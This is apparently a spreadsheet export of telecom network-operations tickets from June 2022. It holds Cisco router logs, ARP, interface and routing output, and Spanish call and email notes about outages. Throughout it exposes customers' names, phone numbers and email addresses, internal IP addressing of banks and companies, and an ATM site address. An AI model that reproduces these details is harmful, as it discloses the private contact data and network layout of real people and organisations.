ACCESS-LIST 1 PERMIT 192.168.1.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CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 8718 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 8718 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 8719 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 05:41:22.435 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 05:41:22.487 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 05:41:47.499 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 05:41:47.551 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 05:52:18.334 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 05:52:18.346 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 05:52:43.722 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 05:52:43.722 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 06:03:10.386 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 06:03:10.438 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 06:03:41.242 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 06:03:41.254 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 06:14:08.770 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 06:14:08.782 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 06:14:36.794 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 06:14:36.810 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 06:25:00.854 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 06:25:00.870 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 06:25:25.918 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 06:25:25.934 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 06:35:51.754 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 06:35:51.806 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 06:36:22.942 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 06:36:22.942 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 06:47:00.942 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 06:47:00.950 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 06:47:38.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 06:47:38.954 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 06:58:16.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 06:58:16.958 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 06:58:54.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 06:58:54.962 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 07:09:32.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 07:09:32.962 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 07:10:10.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 07:10:10.966 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 07:20:48.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 07:20:48.966 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 07:21:26.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 07:21:26.970 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 07:32:04.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 07:32:04.970 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 07:32:42.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 07:32:42.970 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 07:43:20.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 07:43:20.970 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 07:43:58.946 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 07:43:58.974 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 07:54:26.866 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 07:54:26.918 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 07:55:01.090 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 07:55:01.090 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 08:05:28.046 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 08:05:28.098 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 08:05:55.082 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 08:05:55.138 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
*JUN  2 08:16:25.182 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  2 08:16:25.194 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA-CONFG) FAILED
*JUN  2 08:16:49.898 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  2 08:16:49.950 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_CREDO.CFG) FAILED
CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA#
SHOW CLOCK
*08:21:39.082 UTC THU JUN 2 2022
CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.226.1            0   B443.2600.DDE5  ARPA   GIGABITETHERNET2
INTERNET  10.174.226.18           -   4C71.0C9D.7125  ARPA   GIGABITETHERNET2
INTERNET  190.149.59.185          -   4C71.0C9D.7120  ARPA   VLAN1
INTERNET  190.149.59.186          0   INCOMPLETE      ARPA
INTERNET  192.168.1.1             -   4C71.0C9D.7120  ARPA   VLAN1
INTERNET  192.168.1.2             0   683A.1E35.A5F0  ARPA   VLAN1
CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            DOWN           DOWN
FA1                            DOWN           DOWN
FA2                            DOWN           DOWN
GI0                            DOWN           DOWN
GI1                            UP             UP
GI2                            UP             UP       WAN PRINCIPAL/_/8600204T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
NV0                            UP             UP
VL1                            UP             UP       LAN DEL CLIENTE
CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA#
SHOW IP INT BRIEF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DOWN                  DOWN
GIGABITETHERNET1           UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET2           10.174.226.18   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.198.237  YES NVRAM  UP                    UP
NVI0                       10.174.226.18   YES UNSET  UP                    UP
VLAN1                      190.149.59.185  YES NVRAM  UP                    UP
CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.174.226.18
  PING 10.174.226.18: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.226.18 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.18
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.226.18
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.226.18/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>F4586867</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE PARTE DE CL INDICANDO QUE EL SERVIIO ESTA CAIDO --**
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 02:31
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: G276 - ENLACE CLARO - CON ID 770600055T
BUEN DÍA, SEGÚN CHEQUEO EL SERVICIO ESTA CAÍDO.
SALUDOS,</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 78467645 CONTESTA EL SEÑOR SELVIN E INDICA QUE NO CUENTAN CON ENERGIA POR EL MOMENTO **
ID 3001783554
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES 45787911 INDICA QUE POR EL MOMENTO SOLO CUENTA CON ESE NUMERO 78467645 INDICA QUE SOLICITA OTRO Y NO LO ESTARA COMPARTIENDO EN ESO QUE TRATEMOS DE COMUNICARNOS A ESE NUEMRO**
ID 3001779202
**</t>
  </si>
  <si>
    <t>F4586878</t>
  </si>
  <si>
    <t>***--- TELMEX AUTORIZA CIERRE DE SD ---****
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 04:39
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL ID1276048 ::: TICKET CNOC IMFDX004793 ::: "ENLACE FUERA DE SERVICIO"
BUEN DIA
PUEDEN CERRAR EL TICKET, OCURRIÓ UNA FALLA DE ENERGÍA EN SITIO DEL CLIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>F4586922</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRANDON CRUZ AL 24583030 INDICA QUE SI HAY ENERGIA PERO QUE NO TIENEN SEÑAL DE CLARO EN TODO ESE SECTOR INDICA QUE HACE UNOS DIAS TUVIERON PROBLEMAS DE CORTE DE FIBRA PERO NO BRINDA CONTACTO DE PERSONA EN SITIO **
ID 3001794658
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRANDON CRUZ 24583030 MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 3001874931</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRANDON CRUZ AL 24583030 CL INDICA QUE NO ESTA EN SITIO SOLICITA QUE SE LE LLAME EN 15 MIN PARA SABER SI HAY ALGUIEN QUE PUEDA ATENDER EN SITIO**
ID 3001785081
**</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A EDWIN MORALES/CLIENTE, SE LE CONSULTA POR TELS DE PR; INDICA QUE DEDUCE QUE SEA UNA FALLA EN SECTOR, SE LE INDICA QUE SE VERIFICARÁ CON APOYO DE GESTIÓN N1.</t>
  </si>
  <si>
    <t>F4586939</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO POR  PARTE DE CLARO SE PORCEDE CON CIERRE
&lt;GNCYGTG2N2D4A05A15EIM10&gt;PING -VPN TRANSFERENCIAS 10.218.51.8
  PING 10.218.51.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=1 TTL=58 TIME=93 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=2 TTL=58 TIME=89 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=3 TTL=58 TIME=84 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=4 TTL=58 TIME=84 MS
    REPLY FROM 10.218.51.8: BYTES=56 SEQUENCE=5 TTL=58 TIME=85 MS
  --- 10.218.51.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 84/87/93 MS
 PE
10.179.28.50
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DISP IP ROUTI VPN TRANSFERENCIAS 10.218.51.8
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.218.48.0/21  STATIC  1    0             RD  10.174.203.36   VLANIF3235
&lt;GNCYGTG2N2D4A05A15EIM10&gt;DISP CURR INTER VLAN 3235
#
INTERFACE VLANIF3235
 DESCRIPTION TRANSFERENCIAS
 IP BINDING VPN-INSTANCE TRANSFERENCIAS
 IP ADDRESS 10.174.203.35 255.255.255.248
 VRRP VRID 1 VIRTUAL-IP 10.174.203.33
#
RETURN</t>
  </si>
  <si>
    <t>F4586947</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253  CONTESTA EL SEÑOR MALAQUIAS CONFIRMA SERVICIO ESTABLE
Y AUTORIZA CIERRE DE TICKET **
ID 3001796250
**</t>
  </si>
  <si>
    <t>F4586995</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS COYOY AL 58656674 CONFIRMA SERVICIO ESTABLE Y
AUTORIZA CIERRE DE TICKET **
ID 3001824924
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MURGA AL 58656674 INDICA QUE LO ESTAN VIENDO CON EL AREA DE INFRAESTRUCTURA INTERNAMENTE SOLICITA QUE SE LE LLAME EN 5 MIN **
ID 3001819241
**</t>
  </si>
  <si>
    <t>F4587019</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 66378363 CONTESTA EL SEÑOR  DAGOBERTO INDICA QUE NUEVAMENTE SE FUE LA LUZ YA QUE LA LLUVIA ESTA MUY FUERTE Y ESTA CON AIRE POR ESO TIENEN APAGONES A CADA RATO **
ID 3001793493
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 66378363 CONTESTA EL SEÑOR  DAGOBERTO INDICA QUE SE ACABA DE RESTABLECER LA ENERGIA YA QUE NO TENIAN Y QUE REALIZARA PRUEBAS SOLICITA LLAMADA EN 5 MIN PARA CONFIRMAR**
ID 3001787769
**</t>
  </si>
  <si>
    <t>F4587114</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OSMAR  VALTODANO INFORMA QUE LOS EQUIPO ESTAN ENCENDIDOS, YA APLICO 2 REINICIOS PERO ENLACE NO REESTABLECE. ID: 3001785510.</t>
  </si>
  <si>
    <t>F4587127</t>
  </si>
  <si>
    <t>SE LE ENVIA CORREO AL CLIENTE COMO RECORDATORIO || EN ESPERA DE RESPUESTA.
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 08:30
PARA: MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; MONITOREOBDR@CYBERSEG.COM &lt;MONITOREOBDR@CYBERSEG.COM&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: ALARMA REINCIDENTE
ESTIMADO CLIENTE,
DEBIDO A QUE SE HAN PRESENTADO ALARMAS RECURRENTES EN EL ENLACE ABAJO DESCRITO, Y SEGÚN LO INDICADO VÍA TELEFÓNICA CON DIERIKA ZUNU, EN LA AGENCIA CUENTAN CON PROTECCIÓN (UPS) EN LOS EQUIPOS DE COMUNICACIÓN, PERO LOS EQUIPOS SE APAGAN CUANDO SE VA LA ENERGÍA.
TICKET: F4587127
ID: 8901964T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0828
UBICADO EN: 1 CALLE Y 4 AVENIDA ESQUINA ZONA 3 BAJA VERAPAZ RABINAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4587137</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROLANDO MARADIAGA AL 88524151 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 3001826633
**</t>
  </si>
  <si>
    <t>F4587144</t>
  </si>
  <si>
    <t>SE  CONVERSO CON CLIENTE FREDY AVILES, INDICA QUE EL SERVICIO FUE DADO DE BAJA Y QUE ELLOS AUN NO LO HABIAN REGISTRADO COMO  TAL, POR LO QUE INDICA QUE SE DEBE CERRAR EL CASO.
3001793988
COLA:
NOMBRE: A: 42105672
NÚMERO: 42105672
DURACIÓN: 0:04:09
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42105672
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 2/06/2022 08:55:31</t>
  </si>
  <si>
    <t>F4587153</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        		SD	9:16 A. M.
1/4	JORGE FINGADO	58261199	2 HORAS	11:16:00
2/4	JORGE FINGADO	58261199	3 HORAS	12:16:00
3/4	RENE AGUSTIN	58261183	5 HORAS	14:16:00
4/4	RODOLFO MORALES	58261609	6 HORAS	15:16:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ING. LENIN LOPEZ 54419350  INFORMA QUE NO LLEGAN AL ANCHO DE BANDA, SOLICITA VISITA PARA VERTIFICAR LOS 50 MEGAS CONTRATADOS.</t>
  </si>
  <si>
    <t>F4587154</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE || EN ESPERA DE RESPUESTA
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 12:55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C_TYT_GT_ATM3998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
TICKET: F4587154
ID: 47502553T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3998
UBICADO EN: CAJERO 3998 FARMACIA SOCIAL COMUNITARIA, 23 C. 4-96 Z.12 LOC.D VILLA LOBOS 1 VILLA NUEVA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4587164</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PRICILA BRENES AL 87967712  INDICA QUE ESTA DEMASIADO LENTO EL SERVICIO QUE TAMBIEN TIENE PERDIDA DE PAQUETES || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001803901
**</t>
  </si>
  <si>
    <t>F4587190</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ROBERTO TEJADA 57151701 INDICA QUE APLICARON RESET A LA PBX Y EL SERVICIO NORMALIZO, SE PROCEDE AL CIERRE DEL TICKET
RESULTADO: LLAMADA HECHA
NOMBRE: 57151701
NÚMERO: 57151701
INICIO: HOY, 08:59
FIN: HOY, 09:01
DURACIÓN: 1:04
ID DE LLAMADA: 3001797293</t>
  </si>
  <si>
    <t>F4587195</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN FLORES AL 75871177  INDICA QUE ESTA EN EL SITIO || SE NOTIFICA A GESTOR **
ID 3001828043
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN FLORES 75871177 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001873376 - 3001873717</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CRISTIAN FLORES 75871177 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001883486 - 3001883936</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN FLORES 75871177 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001864852 - 3001865719</t>
  </si>
  <si>
    <t>F4587199</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELIAS QUIÑONEZ AL 56329575 / 56240408 CONTESTA EL SEÑOR ALEXANDER CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001807154 - 3001807405
**</t>
  </si>
